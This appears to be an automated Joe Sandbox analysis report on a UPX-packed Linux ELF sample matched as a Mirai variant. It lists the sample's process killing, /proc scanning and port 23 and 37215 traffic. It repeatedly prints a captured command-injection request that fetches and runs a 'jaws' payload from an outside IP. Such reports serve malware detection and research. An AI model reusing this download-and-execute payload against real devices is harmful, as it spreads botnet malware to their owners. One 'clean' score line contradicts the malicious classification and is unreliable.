Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 5243.1.000000001a887bdc.00000000531557b5.r-x.sdmp, type: MEMORY	Matched rule: Detects ELF Mirai variant Author: Florian Roth
Source: 5241.1.000000001a887bdc.00000000531557b5.r-x.sdmp, type: MEMORY	Matched rule: Detects ELF Mirai variant Author: Florian Roth

Sample tries to kill many processes (SIGKILL)

Show sources

Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 2018, result: successful
Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 2077, result: successful
Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 2078, result: successful
Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 2079, result: successful
Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 2080, result: successful
Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 2083, result: successful
Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 2084, result: successful
Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 2156, result: successful
Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 5251, result: successful
Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 5252, result: successful
Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 5253, result: successful
Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 5254, result: successful
Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 5255, result: successful
Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 5256, result: successful
Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 5274, result: successful
Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 5285, result: successful

Source: LOAD without section mappings

Program segment: 0x8048000

Source: 9o6Z1wEokT, type: SAMPLE	Matched rule: SUSP_ELF_LNX_UPX_Compressed_File date = 2018-12-12, author = Florian Roth, description = Detects a suspicious ELF binary with UPX compression, reference = Internal Research, score = 038ff8b2fef16f8ee9d70e6c219c5f380afe1a21761791e8cbda21fa4d09fdb4
Source: 5243.1.00000000764ea583.000000008517f29e.rw-.sdmp, type: MEMORY	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5241.1.00000000764ea583.000000008517f29e.rw-.sdmp, type: MEMORY	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5243.1.000000001a887bdc.00000000531557b5.r-x.sdmp, type: MEMORY	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5243.1.000000001a887bdc.00000000531557b5.r-x.sdmp, type: MEMORY	Matched rule: MAL_ELF_LNX_Mirai_Oct10_1 date = 2018-10-27, hash1 = 3be2d250a3922aa3f784e232ce13135f587ac713b55da72ef844d64a508ddcfe, author = Florian Roth, description = Detects ELF Mirai variant, reference = Internal Research
Source: 5241.1.000000001a887bdc.00000000531557b5.r-x.sdmp, type: MEMORY	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5241.1.000000001a887bdc.00000000531557b5.r-x.sdmp, type: MEMORY	Matched rule: MAL_ELF_LNX_Mirai_Oct10_1 date = 2018-10-27, hash1 = 3be2d250a3922aa3f784e232ce13135f587ac713b55da72ef844d64a508ddcfe, author = Florian Roth, description = Detects ELF Mirai variant, reference = Internal Research
Source: Process Memory Space: 9o6Z1wEokT PID: 5241, type: MEMORYSTR	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =

Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 2018, result: successful
Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 2077, result: successful
Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 2078, result: successful
Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 2079, result: successful
Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 2080, result: successful
Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 2083, result: successful
Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 2084, result: successful
Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 2156, result: successful
Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 5251, result: successful
Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 5252, result: successful
Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 5253, result: successful
Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 5254, result: successful
Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 5255, result: successful
Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 5256, result: successful
Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 5274, result: successful
Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 5285, result: successful

Source: 9o6Z1wEokT

Joe Sandbox Cloud Basic: Detection: clean Score: 0

Perma Link

Source: classification engine

Classification label: mal100.spre.troj.evad.lin@0/0@1/0

Data Obfuscation:

Sample is packed with UPX

Show sources

Source: initial sample	String containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
Source: initial sample	String containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
Source: initial sample	String containing UPX found: $Id: UPX 3.95 Copyright (C) 1996-2018 the UPX Team. All Rights Reserved. $

Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/5143/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/4453/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1582/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/2033/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/2275/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/3088/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1612/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1579/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1699/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1335/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1698/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/2028/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1334/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1576/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/2302/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/3236/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/2025/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/2146/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/910/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/912/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/517/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/759/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/2307/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/918/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/4460/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/5153/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/5274/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/4461/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/4462/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/4465/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1594/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/2285/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/2281/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1349/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1623/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/761/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1622/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/884/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1983/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/2038/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1344/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1465/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1586/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1860/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1463/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/2156/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/800/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/801/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1629/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/4459/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1627/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1900/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/5043/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/5285/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/5200/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/3021/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/491/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/2294/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/2050/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1877/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/772/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1633/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1599/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1632/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/774/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1477/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/654/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/896/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1476/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1872/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/2048/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/655/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1475/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/2289/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/656/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/777/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/657/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/658/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/419/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/936/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1639/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1638/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/2208/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/2180/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/4483/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/4486/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1809/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1494/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1890/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/2063/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/2062/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1888/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1886/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/420/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1489/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/785/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1642/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/788/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/667/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/789/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/5204/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1648/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/2191/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/4491/cmdline
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/4495/cmdline

Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5255)	Directory: /home/saturnino/.cache	Jump to behavior
Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5255)	Directory: /home/saturnino/.local	Jump to behavior
Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5255)	Directory: /home/saturnino/.config	Jump to behavior
Source: /usr/lib/x86_64-linux-gnu/xfce4/xfconf/xfconfd (PID: 5274)	Directory: /home/saturnino/.cache	Jump to behavior
Source: /usr/lib/x86_64-linux-gnu/xfce4/xfconf/xfconfd (PID: 5274)	Directory: /home/saturnino/.local	Jump to behavior
Source: /usr/lib/x86_64-linux-gnu/xfce4/xfconf/xfconfd (PID: 5274)	Directory: /home/saturnino/.config	Jump to behavior
Source: /usr/lib/x86_64-linux-gnu/xfce4/xfconf/xfconfd (PID: 5274)	Directory: /home/saturnino/.config	Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Uses known network protocols on non-standard ports

Show sources

Source: unknown	Network traffic detected: HTTP traffic on port 33156 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 33156 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 33156 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 33156 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 49844
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 49880
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 49892
Source: unknown	Network traffic detected: HTTP traffic on port 33156 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 49896
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 49906
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 49910
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 49928
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 49962
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 49968
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 49976
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 50000
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 50010
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 50014
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 50020
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 50048
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 50058
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 50088
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 50096
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 50100
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 50106
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 50110
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 50130
Source: unknown	Network traffic detected: HTTP traffic on port 59274 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 50150
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 50160
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 50176
Source: unknown	Network traffic detected: HTTP traffic on port 59274 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 59274 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 33156 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 59274 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46722 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46722 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46722 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 59274 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46722 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35056
Source: unknown	Network traffic detected: HTTP traffic on port 42128 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35062
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35070
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35078
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35082
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35108
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35146
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35164
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35220
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35230
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35234
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35240
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35248
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35254
Source: unknown	Network traffic detected: HTTP traffic on port 46722 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35306
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35316
Source: unknown	Network traffic detected: HTTP traffic on port 50834 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35324
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35330
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35338
Source: unknown	Network traffic detected: HTTP traffic on port 50834 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35354
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35378
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35382
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35388
Source: unknown	Network traffic detected: HTTP traffic on port 50834 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35404
Source: unknown	Network traffic detected: HTTP traffic on port 33156 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35410
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35422
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35456
Source: unknown	Network traffic detected: HTTP traffic on port 59274 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35466
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35500
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35506
Source: unknown	Network traffic detected: HTTP traffic on port 50834 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 55404 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46722 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 50834 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46408 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46408 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46408 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46408 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 50834 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 42256 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46408 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 42256 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 42256 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 42256 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46722 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 59274 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 42256 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45540
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45552
Source: unknown	Network traffic detected: HTTP traffic on port 46408 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45556
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45562
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45570
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45592
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45596
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45604
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45618
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45646
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45650
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45656
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45700
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45714
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45722
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45734
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45746
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45750
